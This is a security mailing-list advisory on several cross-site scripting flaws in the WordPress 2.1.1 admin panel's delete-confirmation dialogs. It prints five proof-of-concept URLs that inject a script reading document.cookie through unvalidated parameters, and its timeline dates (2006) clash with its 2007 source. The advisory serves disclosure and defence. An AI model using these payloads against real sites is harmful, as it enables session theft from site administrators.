[UNIX] WordPress Multiple Script Injection Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



WordPress Multiple Script Injection Vulnerabilities
------------------------------------------------------------------------


SUMMARY

" <http://www.wordpress.org> WordPress is a state-of-the-art semantic
personal publishing platform with a focus on aesthetics, web standards,
and usability." Multiple script injection vulnerabilities have been
discovered in WordPress, these allows remote attackers to insert arbitrary
HTML and/or JavaScript into the pages returned to the client.

DETAILS

Vulnerable Systems:
* WordPress version 2.1.1

Stefan Friedli found several vulnerabilities based on an advisory entitled
"WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender" which described a
lack of input validation when deleting posts that allows injection of
arbitrary code. The vulnerability was reported on February, 26th and is
referenced in section VII.

Further to this vulnerability which was limited on manipulating the
"post"-parameter, there are several other vulnerabilities which are very
similar to the one mentioned above. Every operation that makes use of the
common confirm-dialog is vulnerable for this type of attack.

Possible injection...

.. when deleting posts as mentioned in Samenspenders advisory
(unvalidated parameter: post, file: post.php)
http://target.tld/wp-admin/post.php?action=delete
&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.. when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39
&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.. when deleting pages (unvalidated parameter: page, file: page.php)
http://target.tld/wp-admin/page.php?action=delete
&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.. when deleting categories (unvalidated parameter: cat_ID, file:
categories.php)
http://target.tld/wp-admin/categories.php?action=delete&;
cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.. when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&;
p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Impact:
This list may not be exhaustive. It illustrated that the flaw with
confirmation dialogs in Wordpress is not limited to the "Delete
Post"-function. Fixing the validation of the post parameter as suggested
by e.g. Secunia does not fix the problem and does not reduce the threat of
cross-site-scripting or any other webbased exploitation.

Temporary Solution:
Until these issues are patched, possible workarounds are manual fixing or
the usage of a application level filter like mod_security for Apache.

Sources:
Samenspender - WordPress AdminPanel CSRF/XSS - 0day
http://seclists.org/bugtraq/2007/Feb/0494.html

Disclosure Timeline:
02/26/06 - Release of "Delete Post"-Confirmation Vulnerability
02/27/06 - Identification of further vulnerabilities
02/27/06 - Immediate Release for informational purposes


ADDITIONAL INFORMATION

The information has been provided by Stefan Friedli - scip AG.
The original article can be found at:
<http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962>
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages